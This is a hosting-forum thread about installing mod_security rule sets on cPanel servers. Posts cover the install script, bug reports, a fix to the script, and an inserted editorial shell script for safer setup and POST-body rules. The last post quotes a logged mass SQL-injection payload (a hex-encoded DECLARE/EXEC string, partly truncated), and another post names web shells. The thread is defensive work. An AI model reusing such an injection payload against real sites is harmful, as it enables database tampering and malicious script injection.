  1. #1
    Member
    Join Date
    Oct 2006
    Posts
    15

    Default Updated mod_sec rules

    We've updated the mod_security rules on 403security.org to the latest set of non-subscription based rules released by gotroot.com. I've tested the rules thoroughly and ensured that the ruleset is compatible with cPanel and its applications, and modified any rules that required tweaking.

    The new ruleset includes RBL rules, Whitelisting, Exclusion Rules, Malware blacklisting, Pre-defined Malware blacklist, Web Application protection, Bad Useragent Signature blocking, Anti-spam Signatures, Pre-defined Anti-spam blacklist, Enhanced Apache 2.x rules, Anti Rootkit Signatures, "Google Hacks" signatures, and Just In Time Patches.

    I've also created a script to make the installation of the rules much easier. Follow the steps below to download the install script and enable the rules.

    1. Run /scripts/easyapache and follow the on screen menu to enable the mod_security module within Apache 2.x. (This installs mod_security 2.5.5 which is required for this ruleset)
    2. As root, run "wget -O /root/install_modsec_rules http://403security.org/modsec/install_modsec_rules"
    3. As root, run "sh /root/install_modsec_rules" and follow the on screen instructions.

    The script was a quick, last minute thing, so let me know if you run into problems or would like to see enhancements with it. Also, let me know if you have a valid function and/or application that is being blocked by these rules and I will work to modify the ruleset to allow proper functionality, while keeping a secure set of rules in place.

    UPDATE:
    v1.3
    I've modified the installation script a bit to automatically check for a valid Apache configuration before requesting a restart.
    You can now hit enter to automatically set the default rule location
    The includes are configured within the default config file which shows within the Mod_security interface within WHM. This allows the capability to enable or disable a complete set of rules from within the WHM interface.
    Added better functionality when choosing the default data directory

    Please email any enhancement requests to todd@403security.org
    Last edited by p0liX; 07-11-2008 at 11:51 AM. Reason: added updates

  2. #2
    Member
    Join Date
    Aug 2005
    Posts
    13

    Default

    Get 406 Not Acceptable error on the home page of 403security.org

    I have a question about mod_security.

    It's easy to block the c99 shell as it uses URL parameters, but r57 uses POST.

    I tried to use ARGS and block "/home/" but it doesn't seem to work.

    Do you know how to block a web page when a string is matched in POST data?

    Thanks in advance.

  3. #3
    Member
    Join Date
    Mar 2008
    Location
    Amsterdam, Netherlands
    Posts
    102

    Default

    Hi p0liX.

    I just followed your instructions.
    No problems so far. I will let you know if something goes wrong.

    Thank you.

    Ronald.

  4. #4
    cPanel Partner NOC cPanel Partner NOC Badge
    Join Date
    Feb 2004
    Posts
    87

    Default

    Hi,
    I tested it but it failed:



    15:40:32 (63.0 KB/s) - `/tmp/modsec2.conf.gz' saved [430/430]

    Unpacking configuration file
    Backing up current configuration
    Testing configuration to be sure there are no errors

    Apache Configuration FAILED!


    Restoring backup configuration file
    Moved failed configuration to /usr/local/apache/conf/modsec2.conf.bad
    Check the error above and resolve any conflicts before attempting the installation again
    Cleaning up
    Installation complete
    root@max9 [~]# cat /usr/local/apache/conf/modsec2.conf.bad
    LoadFile /opt/xml2/lib/libxml2.so
    LoadFile /opt/lua/lib/liblua.so
    LoadModule security2_module modules/mod_security2.so

    <IfModule mod_security2.c>
    SecRuleEngine On
    # See http://www.modsecurity.org/documenta...ion-Matrix.pdf
    # "Add the rules that will do exactly the same as the directives"
    # SecFilterCheckURLEncoding On
    # SecFilterForceByteRange 0 255
    SecAuditEngine RelevantOnly
    SecAuditLog logs/modsec_audit.log
    SecDebugLog logs/modsec_debug_log
    SecDebugLogLevel 0
    SecDefaultAction "phase:2,deny,log,status:406"
    SecRule REMOTE_ADDR "^127.0.0.1$" nolog,allow
    #Include "/usr/local/apache/conf/modsec2.user.conf"
    Include /usr/local/apache/conf/modsec_rules/*.conf
    </IfModule>


    Server version: Apache/2.0.63
    Server built: Jul 10 2008 14:50:53
    Cpanel::Easy::Apache v3.2.0 rev4341


    help?

  5. #5
    Member
    Join Date
    Oct 2006
    Posts
    15

    Default

    Hmm, looks like the config tests failed, but it didn't give the error as it is supposed to.

    Can you email the entire output from the installation to todd@403security.org?

  6. #6
    Member
    Join Date
    Oct 2006
    Posts
    15

    Default

    Quote Originally Posted by kctt:
    Get 406 Not Acceptable error on the home page of 403security.org

    I have a question about mod_security.

    It's easy to block the c99 shell as it uses URL parameters, but r57 uses POST.

    I tried to use ARGS and block "/home/" but it doesn't seem to work.

    Do you know how to block a web page when a string is matched in POST data?

    Thanks in advance.
    This should be resolved, please attempt the installation again.

  7. #7
    LBJ
    Member
    Join Date
    Nov 2003
    Posts
    46

    Thumbs up

    First off, thanks very much p0liX. I haven't tested the rules themselves yet, but it's excellent that you've made your work available.

    Quote Originally Posted by richenou:
    I tested it but it failed:
    I'm guessing you accepted the default location by entering a blank. That would take you to...

    Code:
    else
            echo "Nothing was entered, Using default directory /usr/local/apache/conf/modsec_rules"
            RULEDIR="/usr/local/apache/conf/modsec_rules"
            if [ -d $RULEDIR ]; then
                    echo "Directory already exists.  Backing up current directory"
                    mv $RULEDIR $RULEDIR.`date +%m%d%Y-%H%M`
                    mkdir $RULEDIR
                    if [ -d $RULEDIR ]; then
            	        echo "Directory created successfully"
                    else
                            echo "Directory creation failed."
                            echo "Installation aborted"
                            exit 0
                            fi
                    fi
    fi
    That logic is used when you accept the default destination path by entering a blank. It doesn't handle the situation where the folder doesn't already exist. It only creates the folder after an existing folder has been moved. The creation logic is incorrectly contained in the same if fi block. I think p0liX wanted something more like...

    Code:
    else
            echo "Nothing was entered, Using default directory /usr/local/apache/conf/modsec_rules"
            RULEDIR="/usr/local/apache/conf/modsec_rules"
            if [ -d $RULEDIR ]; then
                    echo "Directory already exists.  Backing up current directory"
                    mv $RULEDIR $RULEDIR.`date +%m%d%Y-%H%M`
            fi
            mkdir $RULEDIR
            if [ -d $RULEDIR ]; then
                    echo "Directory created successfully"
            else
                    echo "Directory creation failed."
                    echo "Installation aborted"
                    exit 0
            fi
    fi
    That should correct it.

    Regards,

    LBJ
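Two things in this thread go unanswered in code: kctt's question (post #2) about blocking a string that only appears in POST data, and the install script behaviour LBJ reviews above (the default directory is only created when an old one was moved away, and post #4 got "Apache Configuration FAILED!" with no error shown). The following shell script is an added example written for this page; it is not the 403security.org install script and was not posted by anyone in the thread. It backs up and recreates the rule directory whether or not it already exists, writes a small local rule file that inspects POST fields, and runs the Apache config test while capturing its output so a failure actually shows why, restoring the backup as the original does. The apachectl path, the rule ids and the rule file name `zz_local_post_body.conf` are assumptions. The security-relevant point for kctt's case is that ModSecurity 2.x defaults SecRequestBodyAccess to Off (the modsec2.conf in post #4 does not set it either); with it Off, ARGS only covers the query string, so a rule on ARGS never sees POST fields no matter how it is written. The rule must also run in phase 2, because the body has not been read in phase 1.

```shell
#!/bin/sh
# Added example, not the 403security.org install script: safer versions of the
# steps discussed in this thread. Paths default to the ones used in the thread
# and can be overridden by exporting the variables before running.
: "${RULEDIR:=/usr/local/apache/conf/modsec_rules}"
: "${MODSEC_CONF:=/usr/local/apache/conf/modsec2.conf}"
# Assumption: apachectl location on a cPanel Apache 2.x build.
: "${CONFIGTEST:=/usr/local/apache/bin/apachectl configtest}"

# Back up an existing rule directory (if any), then create a fresh one.
# The directory is created whether or not one existed, which is the case
# the original script missed.
ensure_rule_dir() {
    dir="$1"
    if [ -d "$dir" ]; then
        backup="$dir.$(date +%m%d%Y-%H%M%S)"
        echo "Directory already exists. Backing up to $backup"
        mv "$dir" "$backup" || return 1
    fi
    mkdir -p "$dir" || { echo "Directory creation failed."; return 1; }
    echo "Directory created successfully"
}

# Write a small local rule file that inspects POST data.
# SecRequestBodyAccess must be On: with it Off, ARGS only covers the query
# string, so a rule on ARGS never sees POST fields. Phase 2 is required
# because the request body is not available in phase 1.
# The rule ids are assumed to be free in the 1000000+ range.
write_post_body_rule() {
    cat > "$1" <<'EOF'
SecRequestBodyAccess On
# Block any request argument (query string or POST field) containing /home/
SecRule ARGS "@contains /home/" "phase:2,deny,log,status:406,id:1000001,msg:'local rule: /home/ in request argument'"
# ARGS_POST in place of ARGS would restrict the same check to POST fields only
EOF
}

# Run the config test and keep its output so the operator sees the actual
# error (post #4 got "FAILED" with nothing above it). On failure the bad
# config is set aside and the backup restored, as the original script does.
test_config_or_restore() {
    conf="$1"; backup="$2"
    if out=$($CONFIGTEST 2>&1); then
        echo "Apache configuration OK"
        return 0
    fi
    echo "Apache configuration FAILED:"
    echo "$out"
    mv "$conf" "$conf.bad"
    cp "$backup" "$conf"
    echo "Restored $conf from $backup; failed configuration kept as $conf.bad"
    return 1
}

# Full flow, to be run as root on the server (hypothetical rule file name):
#   cp "$MODSEC_CONF" "$MODSEC_CONF.bak"
#   ensure_rule_dir "$RULEDIR"
#   write_post_body_rule "$RULEDIR/zz_local_post_body.conf"
#   test_config_or_restore "$MODSEC_CONF" "$MODSEC_CONF.bak"
```

Because the thread's modsec2.conf already includes every `*.conf` under the rules directory, a local rule file written there is picked up without touching the main config, and the config test runs before any restart is requested, which is what v1.3 of the script set out to do.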

  8. #8
    Member
    Join Date
    Oct 2006
    Posts
    15

    Default

    Thanks for the suggestion. I've uploaded v1.3 of the install script which handles the default directory better as well as a couple other small improvements.

  9. #9
    LBJ
    Member
    Join Date
    Nov 2003
    Posts
    46

    Default

    Quote Originally Posted by p0liX:
    Thanks for the suggestion. I've uploaded v1.3 of the install script which handles the default directory better as well as a couple other small improvements.
    That's looking very nice now and the rules are working well without causing issues for CPanel or any addons.

    Thanks very much for making your project available for us.

    Regards,

    LBJ

  10. #10
    Member
    Join Date
    Oct 2006
    Posts
    15

    Default

    Thanks for the feedback. If anyone does find a problem with a feature not working or an application hitting a rule, please let me know and send log information so I can tweak the ruleset a bit more. I won't be able to test every scenario out there so any feedback would be appreciated.

  11. #11
    Member
    Join Date
    Mar 2002
    Posts
    31

    Default

    Quote Originally Posted by LBJ:
    That's looking very nice now and the rules are working well without causing issues for CPanel or any addons.

    Thanks very much for making your project available for us.
    Indeed... Thanks multiplied here too... Very useful indeed...

    Have you considered some form of automation for downloading the latest available rules and even one for those with a subscription?

    Might be worth a play

  12. #12
    Member
    Join Date
    Jun 2007
    Posts
    10

    Default

    Thanks p0liX, works great.

  13. #13
    Member
    Join Date
    Nov 2004
    Posts
    6

    Default

    The site has been down all day, anyone have the rules you can send me?

    Mike
    qdo69 AT gmail.com

  14. #14
    Member Mat-d-rat's Avatar
    Join Date
    Jul 2003
    Posts
    94

    Default

    Still down, I wanted to update my rules as well...
    ## # Mat # ##
    www.matmoo.com

  15. #15
    Member
    Join Date
    Jul 2005
    Location
    Sticky On Internet
    Posts
    555

    Default

    Why has 403security.org not been working for a few days?

    I found this name recently on another forum and don't know where to find the ruleset so I can safely move to Apache 2.x.

    Most of the attacks I am getting recently on Apache 1.3.x are something like:

    hostname "www.sxxxxxx.org"] [uri "/album/?p=30';DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(034C415245204054207661726617263686172283430303029204445434C415245205461626C655F437572736F7220437970653D3939206F7220622E78747970653D3335206F750494E544F2040542C40432057484974206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687477777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726973C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040TRUNCATED-LONG-TEXT-LONG-TEXT2%20AS%20CHAR(4000));ExEC(@S);"]
    What kind of exploit is this? Although my gotroot ruleset is blocking it, I get 50+ such attempts every few hours.
    Learn atleast A word Daily

    7+1 Dedicated Boxes with cPanel...
